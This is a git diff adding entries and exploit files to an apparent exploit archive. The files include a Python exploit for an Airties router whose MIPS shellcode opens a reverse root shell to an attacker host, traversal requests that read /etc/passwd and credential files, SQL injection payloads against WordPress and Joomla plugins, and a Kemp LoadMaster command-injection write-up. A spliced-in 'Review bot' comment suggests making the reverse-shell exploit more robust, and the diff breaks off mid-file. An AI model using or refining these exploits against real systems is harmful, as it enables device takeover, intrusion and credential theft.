diff --git a/files.csv b/files.csv
index 7933d15dd..3eb3130ee 100755
--- a/files.csv
+++ b/files.csv
@@ -32798,9 +32798,9 @@ id,file,description,date,author,platform,type,port
 36369,platforms/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass Via HTTP Header Pollution",2015-03-12,"BGA Security",xml,webapps,0
 36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload (Code Execution)",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0
 36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - LFI Vulnerability",2015-03-12,"TUNISIAN CYBER",php,webapps,0
-36372,platforms/php/webapps/36372.txt,"Wordpress Theme DesignFolio Plus 1.2 - Arbitrary File Upload Vulnerability",2015-03-04,"Crash bandicot",php,webapps,0
-36373,platforms/php/webapps/36373.txt,"Joomla Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,"Crash bandicot",php,webapps,0
-36374,platforms/php/webapps/36374.txt,"Wordpress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,"Crash bandicot",php,webapps,0
+36372,platforms/php/webapps/36372.txt,"Wordpress Theme DesignFolio Plus 1.2 - Arbitrary File Upload Vulnerability",2015-03-04,CrashBandicot,php,webapps,0
+36373,platforms/php/webapps/36373.txt,"Joomla Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,php,webapps,0
+36374,platforms/php/webapps/36374.txt,"Wordpress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps,0
 36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 Web Interface Directory Traversal Vulnerability",2011-11-29,"Nick Freeman",asp,webapps,0
 36376,platforms/windows/remote/36376.txt,"Oxide WebServer Directory Traversal Vulnerability",2011-11-29,demonalex,windows,remote,0
 36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 HTTP POST Request NULL Pointer Content-Length Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0
@@ -32977,9 +32977,9 @@ id,file,description,date,author,platform,type,port
 36557,platforms/windows/local/36557.txt,"HTTrack Website Copier 3.48-21 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0
 36558,platforms/windows/local/36558.txt,"UltraISO 9.6.2.3059 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0
 36559,platforms/php/webapps/36559.txt,"Wordpress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0
-36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,"Crash bandicot",php,webapps,0
+36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
-36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,"Crash bandicot",php,webapps,0
+36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
 36564,platforms/linux/local/36564.txt,"Fedora 21 - setroubleshootd Local Root PoC",2015-03-30,"Sebastian Krahmer",linux,local,0
 36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
 36566,platforms/php/webapps/36566.txt,"Beehive Forum 101 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
@@ -32991,6 +32991,7 @@ id,file,description,date,author,platform,type,port
 36572,platforms/php/webapps/36572.txt,"Toner Cart 'show_series_ink.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
 36573,platforms/php/webapps/36573.txt,"MMORPG Zone 'view_news.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
 36574,platforms/php/webapps/36574.txt,"Freelance Zone 'show_code.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
+36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0
 36579,platforms/windows/remote/36579.rb,"Adobe Flash Player ByteArray With Workers Use After Free",2015-03-31,metasploit,windows,remote,0
 36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent XSS Vulnerability",2015-03-31,"Michael Hendrickx",windows,webapps,0
 36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80
@@ -33007,3 +33008,23 @@ id,file,description,date,author,platform,type,port
 36592,platforms/php/webapps/36592.txt,"Joomla 'com_sanpham' Component Multiple SQL Injection Vulnerabilities",2012-01-21,the_cyber_nuxbie,php,webapps,0
 36593,platforms/php/webapps/36593.txt,"Joomla! 'com_xball' Component 'team_id' Parameter SQL Injection Vulnerability",2012-01-23,CoBRa_21,php,webapps,0
 36594,platforms/php/webapps/36594.txt,"Joomla! 'com_boss' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36595,platforms/php/webapps/36595.txt,"Joomla 'com_car' Component Multiple SQL Injection Vulnerabilities",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36596,platforms/php/webapps/36596.txt,"Joomla! 'com_some' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36597,platforms/php/webapps/36597.txt,"Joomla! 'com_bulkenquery' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36598,platforms/php/webapps/36598.txt,"Joomla! 'com_kp' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36599,platforms/asp/webapps/36599.txt,"Raven 1.0 'connector.asp' Arbitrary File Upload Vulnerability",2012-01-21,HELLBOY,asp,webapps,0
+36600,platforms/php/webapps/36600.txt,"Wordpress Business Intelligence Plugin - SQL injection",2015-04-02,"Jagriti Sahu",php,webapps,80
+36601,platforms/php/webapps/36601.txt,"Joomla Spider Random Article Component - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80
+36602,platforms/windows/remote/36602.html,"Webgate WESP SDK 1.2 ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
+36603,platforms/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
+36604,platforms/windows/remote/36604.html,"WebGate WinRDS 2.0.8 PlaySiteAllChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
+36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
+36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
+36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80
+36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injection",2015-04-02,"ITAS Team",php,webapps,80
+36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80
+36615,platforms/php/webapps/36615.txt,"Wordpress Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80
+36616,platforms/php/webapps/36616.txt,"phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection",2015-04-02,@u0x,php,webapps,80
+36617,platforms/php/webapps/36617.txt,"WordPress VideoWhisper Video Presentation 3.31.17 - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
+36618,platforms/php/webapps/36618.txt,"VideoWhisper Video Conference Integration 4.91.8 - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
+36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0
diff --git a/platforms/asp/webapps/36599.txt b/platforms/asp/webapps/36599.txt
new file mode 100755
index 000000000..f35b8d376
--- /dev/null
+++ b/platforms/asp/webapps/36599.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51631/info
+
+Raven is prone to a vulnerability that lets an attacker upload and execute arbitrary script code in the context of the affected webserver process. The issue occurs because the application fails to sufficiently sanitize user-supplied input.
+
+Raven 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[patch]/admin/fck2/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp&ServerPath=/forum/uploads/
+
+http://www.example.com/forum/admin/fck2/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp&ServerPath=/forum/uploads/
\ No newline at end of file
diff --git a/platforms/linux/webapps/36619.txt b/platforms/linux/webapps/36619.txt
new file mode 100755
index 000000000..65d807ec5
--- /dev/null
+++ b/platforms/linux/webapps/36619.txt
@@ -0,0 +1,39 @@
++------------------------------------------------------------------------------------------------------+
++ Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal Vulnerability and Arbitrary File Access +
++------------------------------------------------------------------------------------------------------+
+Affected Product: Ericsson Drutt MSDP (Instance Monitor)
+Vendor Homepage : www.ericsson.com
+Version : 4, 5 and 6
+CVE v2 Vector : AV:N/AC:L/Au:N/C:P/I:N/A:N
+CVE : CVE-2015-2166
+Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
+Patched : Yes
+
++-------------+
++ Description +
++-------------+
+Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP. The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf.
+
+The identified vulnerability affects the Instance Monitor component and allows a unauthenticated remote attacker to access arbitrary files on the file system.
+
++----------------------+
++ Exploitation Details +
++----------------------+
+This vulnerability can be triggered via a simple, similar to the below HTTP GET request(s):
+
+ http://:/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
+ http://:/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt/drutt/msdp/manager/conf/props/msdp-users.properties
+ http://:/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/opt/drutt/msdp/manager/conf/ccContext.properties
+
++---------------------+
++ Disclosure Timeline +
++---------------------+
+17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback
+24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office
+24.Feb.2015 - Contacted Corporate Security Office team
+02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel
+02.Mar.2015 - Shared vulnerability details
+06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches
+08.Mar.2015 - Agreed on public disclosure timelines
+12.Mar.2015 - Patches released
+31.Mar.2015 - Public disclosure
\ No newline at end of file
diff --git a/platforms/multiple/remote/36577.py b/platforms/multiple/remote/36577.py
new file mode 100755
index 000000000..9967b6fee
--- /dev/null
+++ b/platforms/multiple/remote/36577.py
@@ -0,0 +1,78 @@ +#!/usr/bin/env python +##################################################################################### +# Exploit for the AIRTIES Air5650v3TT +# Spawns a reverse root shell +# Author: Batuhan Burakcin +# Contact: batuhan@bmicrosystems.com +# Twitter: @batuhanburakcin +# Web: http://www.bmicrosystems.com +##################################################################################### + +import sys +import time +import string +import socket, struct +import urllib, urllib2, httplib + + + + + +if __name__ == '__main__': + + + + + try: + ip = sys.argv[1] + revhost = sys.argv[2] + revport = sys.argv[3] + except: + print "Usage: %s " % sys.argv[0] + + host = struct.unpack('>L',socket.inet_aton(revhost))[0] + port = string.atoi(revport) + + + shellcode = "" + shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd" + shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff" + shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0" + shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] + shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] + shellcode += "\xaf\xae\xff\xe4" + shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1] + shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3] + shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27" + shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27" + shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c" + shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff" + shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f" + 
shellcode += "\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec" + shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab" + shellcode += "\x01\x01\x01\x0c" + + + data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40" + data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C" + data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48 + + pdata = { + 'redirect' : data, + 'self' : '1', + 'user' : 'tanri', + 'password' : 'ihtiyacmyok', + 'gonder' : 'TAMAM' + } + + login_data = urllib.urlencode(pdata) + #print login_data + + url = 'http://%s/cgi-bin/login' % ip + header = {} + req = urllib2.Request(url, login_data, header) + rsp = urllib2.urlopen(req) + + + + diff --git a/platforms/multiple/webapps/36609.txt b/platforms/multiple/webapps/36609.txt new file mode 100755 index 000000000..808dba9a9 --- /dev/null +++ b/platforms/multiple/webapps/36609.txt 
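Review bot: The bare `except:` at the top of the `__main__` block in 36577.py only prints the usage line and then falls through, so a run with missing arguments fails on the next statement with a NameError on `revhost` instead of stopping; the handler should be `except IndexError:` and end with `sys.exit(1)`. The usage string as shown, `"Usage: %s "`, names none of the three expected arguments (the placeholders may have been lost in rendering). The header comment gives the device as `Air5650v3TT` while the files.csv row added in this commit says `Air5650TT`, and neither states the firmware build that the addresses hard-coded in `data` were taken from; a header line such as `# Tested on: <MODEL / FIRMWARE BUILD - not stated on this page>` would let a defender decide whether a given unit is in scope.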
@@ -0,0 +1,150 @@
+# Exploit Title: Kemp Load Master - Multiple Vulnerabilities (RCE, CSRF, XSS, DoS)
+# Date: 01 April 2015
+# Author: Roberto Suggi Liverani
+# Software Link: http://kemptechnologies.com/load-balancer/
+# Version: 7.1.16 and previous versions
+# Tested on: Kemp Load Master 7.1-16
+# CVE : CVE-2014-5287/5288
+
+Link: http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html
+
+Kemp virtual load master is a virtual load-balancer appliance which comes with a web administrative interface. I had a chance to test it and this blog post summarises some of the most interesting vulnerabilities I have discovered and which have not been published yet. For those of you who want to try it as well, you can get a free trial version here: http://kemptechnologies.com/server-load-balancing-appliances/virtual-loadbalancer/vlm-download
+
+By default, Kemp web administrative interface is protected by Basic authentication, so the vulnerabilities discussed in the post below can either be exploited attacking an authenticated user via CSRF or XSS based attacks.
+
+The following vulnerabilities were discovered when looking at Kemp Load Master v.7.1-16 and some of them should be fixed in the latest version (7.1-20b or later).
+
+Change logs of the fixed issues can be found at the following page:
+
+"PD-2183 Functions have been added to sanitize input in the WUI in order to resolve some security issues – fix for CVE-2014-5287 and CVE-2014-5288".
+
+Remote Code Execution - status: fixed in 7.1.20b (reported in June 2014) - CVE-2014-5287/5288
+
+An interesting remote code execution vector can be found through the attack payload below:
+
+http://x.x.x.x/progs/fwaccess/add/1|command
+
+The web application functionality is based on multiple bash scripts contained in the /usr/wui/progs folder. The application is using CGI so that the scripts can handle HTTP requests.
+
+
+We notice that if the result of the command on line 285 is not positive (check on 286), then seterrmsg function is called.
+
+
+On line 318 we see a dangerous "eval" against our parameters. By simply attempting multiple characters, the seterrmsg function is invoked and returns plenty of interesting information:
+
+http://x.x.x.x/progs/fwaccess/add/1'ls
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Sat, 27 Dec 2014 23:25:55 GMT
+Server: mini-http/1.0 (unix)
+Connection: close
+Content-Type: text/html
+/usr/wui/progs/util.sh: eval: line 318: unexpected EOF while looking for matching `''
+/usr/wui/progs/util.sh: eval: line 319: syntax error: unexpected end of file
+
+line 318 contains an eval against the $@ (which contains our arguments). The arguments are passed via the fwaccess page, where IFS is set with a slash "/" separator.
+
+By attempting the request below, it is possible to achieve code execution:
+
+http://x.x.x.x/progs/fwaccess/add/1|ls
+
+Response:
+
+
+Line 120 and line 190 reports an integer expression expected error, as our argument is "1|ls" is obviously no longer an integer. However, the command execution works fine, as we are redirecting output through the pipe character and to "ls" command.
+
+The application is flawed in so many other points, also, via HTTP POST requests
+
+
+Other injection points that were found:
+
+Page: /progs/geoctrl/doadd
+Method: POST
+Parameter: fqdn
+
+Page: /progs/networks/hostname
+Method: POST
+Parameter: host
+
+Page: /progs/networks/servadd
+Method: POST
+Parameter: addr
+
+Page: /progs/useradmin/setopts
+Method: POST
+Parameter: xuser
+
+So how can we exploit all this goodness?
+
+CSRF (Cross Site Request Forgery) - status: not fixed - reported in June 2014
+
+We can use another vulnerability, such as CSRF - most of the pages of the administrative are vulnerable to this attack, so even though a user is authenticated via Basic authentication, the forged request will force the browser to pass the credentials within the HTTP request.
+
+Interestingly enough, there are some kind of protections against CSRF for critical functions, such as factory reset, shutdown and reset. However, they are flawed as well, as the "magic" token matches with the unix epoch timestamp, so it is predictable and can be passed within the request.
+
+
+Reflected and Stored XSS - status: partially fixed - reported on June 2014
+
+Another way to attack users is via XSS - in this case, we have plenty of options, as both reflected and stored XSS are there. For instance, a user might want to CSRF -> Store XSS -> BeEF just to achieve persistence.
+
+Reflected XSS was found on this point:
+
+Page: /progs/useradmin/setopts
+Method: POST
+Parameter: xuser
+
+
+Stored XSS was found on the following points:
+
+Page: /progs/geoctrl/doadd
+Method: POST
+Parameter: fqdn
+
+
+A further injection points:
+
+Page: /progs/fwaccess/add/0
+Method: POST
+Parameter: comment
+
+Page: /progs/doconfig/setmotd
+Method: POST
+Parameter:
+
+BeEF Module
+
+As part of this research, I have developed a BeEF module to take advantage of chaining these vulnerabilities together. It is always sweet to use a XSS as a starting point to perform code execution against an appliance.
+
+The github pull request for the module can be found here: https://github.com/beefproject/beef/pull/1104/files
+
+
+For this module, I wanted to use the beef.net.forge_request() function, using a POST method, required to exploit the above RCE vector attacks. However, POST method was not usable at moment of writing this module and @antisnatchor was very quick to fix it in this case. So if you want to try it, ensure you have the latest version of BeEF installed.
+
+
+Extra - bonus
+
+Denial of Service - status: unknown - reported on June 2014
+
+It appears the thc-ssl-dos tool can bring down the Kemp Load Master administrative interface, which is served over SSL. The same goes if a balanced service is using SSL via Kemp Load Master.
+
+Shell-shock - status: unknown - reported in 2015
+
+Obviously, the application is not immune from the infamous shell-shock vulnerability. This was found by my friend Paul Heneghan and then by a user complaining on the vendor's blog (the comment has been removed shortly after).
+
+For those of you who are more curios, the shell-shock vulnerability works perfectly via the User-Agent header, also in version 7.1-18 and possibly on version 7.1-20 as well.
+
+
+
+Funny enough, Kemp provides Web Application Firewall protection, but I wonder how they can "prevent" the OWASP Top Ten (as they claim here), if their main product is affected by so many critical vulnerabilities ;-)
+
+If you are keen for an extra-extra bonus, keep reading...
+
+Extra - extra bonus:
+
+No license, no web authentication
+
+
+However, most of the underlying functionality is still available and "attackable" without need of basic authentication. You can invalidate the license with a CSRF setting time far in the future ;-)
+
diff --git a/platforms/php/webapps/36595.txt b/platforms/php/webapps/36595.txt
new file mode 100755
index 000000000..bf71e5244
--- /dev/null
+++ b/platforms/php/webapps/36595.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/51620/info
+
+The 'com_car' component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_car&view=product&modelsid=[SQLi]
+http://www.example.com/index.php?option=com_car&view=product&task=showAll&markid=[SQLi]
+http://www.example.com/index.php?option=com_car&brand_id=[SQLi]
+http://www.example.com/index.php?option=com_car&view=product&task=detail&markid=6&modelsid=&cid[]=[SQLi]
+http://www.example.com/index.php?option=com_car&view=product&markid=&modelsid=[SQLi]
\ No newline at end of file
diff --git a/platforms/php/webapps/36596.txt b/platforms/php/webapps/36596.txt
new file mode 100755
index 000000000..de4876c4f
--- /dev/null
+++ b/platforms/php/webapps/36596.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51621/info
+
+The 'com_some' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+http://www.example.com/index.php?option=com_some&controller=../../../../../../../../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/platforms/php/webapps/36597.txt b/platforms/php/webapps/36597.txt
new file mode 100755
index 000000000..50f5354b2
--- /dev/null
+++ b/platforms/php/webapps/36597.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51622/info
+
+The 'com_bulkenquery' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+http://www.example.com/index.php?option=com_bulkenquery&controller=../../../../../../../../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/platforms/php/webapps/36598.txt b/platforms/php/webapps/36598.txt
new file mode 100755
index 000000000..de8a1223f
--- /dev/null
+++ b/platforms/php/webapps/36598.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51623/info
+
+The 'com_kp' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+http://www.example.com/index.php?option=com_kp&controller=[LFI]
\ No newline at end of file
diff --git a/platforms/php/webapps/36600.txt b/platforms/php/webapps/36600.txt
new file mode 100755
index 000000000..be3384f52
--- /dev/null
+++ b/platforms/php/webapps/36600.txt
@@ -0,0 +1,68 @@ +################################################################################################## +#Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability +#Author : Jagriti Sahu AKA Incredible +#Vendor Link : https://www.wpbusinessintelligence.com +#Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip +#Date : 1/04/2015 +#Discovered at : IndiShell Lab +#Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^ +################################################################################################## + +//////////////////////// +/// Overview: +//////////////////////// + +Wordpress plugin "Business Intelligence" is not filtering data in GET parameter ' t ', which in is file 'view.php' +and passing user supplied data to SQL queries' hence SQL injection vulnerability has taken place. + + + +/////////////////////////////// +// Vulnerability Description: / +/////////////////////////////// + +vulnerability is due to parameter " t " in file 'view.php'. +user can inject sql query using GET parameter 't' + + +//////////////// +/// POC //// +/////////////// + + +POC Image URL---> +================= +http://tinypic.com/view.php?pic=r8dyl0&s=8#.VRrvcuHRvIU + + +SQL Injection in parameter 't' (file 'view.php'): +================================================= + +Injectable Link---> http://server/wp-content/plugins/wp-business-intelligence/view.php?t=1 + +Union based SQL injection exist in the parameter which can be exploited as follows: + + +Payload used in Exploitation for Database name ---> + +http://server/wp-content/plugins/wp-business-intelligence/view.php +?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+ + + +### +EDB Note: PoC might need work depending on version of plugin. +The provided software link is for the lite version. 
+Tested with following PoC: +wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=1 +wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=2 +### + + +################################################################################################### + + + --==[[Special Thanks to]]==-- + + # Manish Kishan Tanwar ^_^ # + + diff --git a/platforms/php/webapps/36601.txt b/platforms/php/webapps/36601.txt new file mode 100755 index 000000000..51e02e51f --- /dev/null +++ b/platforms/php/webapps/36601.txt 
@@ -0,0 +1,54 @@ +################################################################################################## +#Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability +#Author : Jagriti Sahu AKA Incredible +#Vendor Link : http://demo.web-dorado.com/spider-random-article.html +#Date : 22/03/2015 +#Discovered at : IndiShell Lab +#Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^ +################################################################################################## + +//////////////////////// +/// Overview: +//////////////////////// + + +joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters +and hence affected by SQL injection vulnerability + +/////////////////////////////// +// Vulnerability Description: +/////////////////////////////// +vulnerability is due to catID and Itemid parameter + + +//////////////// +/// POC //// +/////////////// + + +SQL Injection in catID parameter +================================= + +Use error based double query injection with catID parameter + +Injected Link---> + +Like error based double query injection for exploiting username ---> +http://server/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13 + + +SQL Injection in Itemid parameter +================================= + +Itemid Parameter is exploitable using xpath injection + +http://server/index.php?option=com_rand&catID=1&limit=1&style=1&view=articles&format=raw&Itemid=13'and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- - + +################################################################################################### + + + --==[[Special Thanks 
to]]==-- + + # Manish Kishan Tanwar ^_^ # + + diff --git a/platforms/php/webapps/36613.txt b/platforms/php/webapps/36613.txt new file mode 100755 index 000000000..1af39ad15 --- /dev/null +++ b/platforms/php/webapps/36613.txt 
@@ -0,0 +1,219 @@
+#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection
+#Product: Wordpress plugin Simple Ads Manager
+#Vendor: https://profiles.wordpress.org/minimus/
+#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
+#Download link: https://wordpress.org/plugins/simple-ads-manager/
+#CVE ID: CVE-2015-2824
+#Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team
+
+
+::PROOF OF CONCEPT::
+
+---SQL INJECTION 1---
+
++ REQUEST:
+
+POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
+Host: target.com
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
+Content-Length: 270
+Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+action=sam_hits&hits%5B0%5D%5B%5D=&hits%5B1%5D%5B%5D=&hits%5B2%5D%5B%5D=&level=3
+
+
+- Vulnerable file: simple-ads-manager/sam-ajax.php
+- Vulnerable code:
+
+ case 'sam_ajax_sam_hits':
+ if(isset($_POST['hits']) && is_array($_POST['hits'])) {
+ $hits = $_POST['hits'];
+ $values = '';
+ $remoteAddr = $_SERVER['REMOTE_ADDR'];
+ foreach($hits as $hit) {
+ $values .= ((empty($values)) ? '' : ', ') .
"({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
+ }
+ $sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};";
+ $result = $wpdb->query($sql);
+ if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
+ else echo json_encode(array(
+ 'success' => false,
+ 'result' => $result,
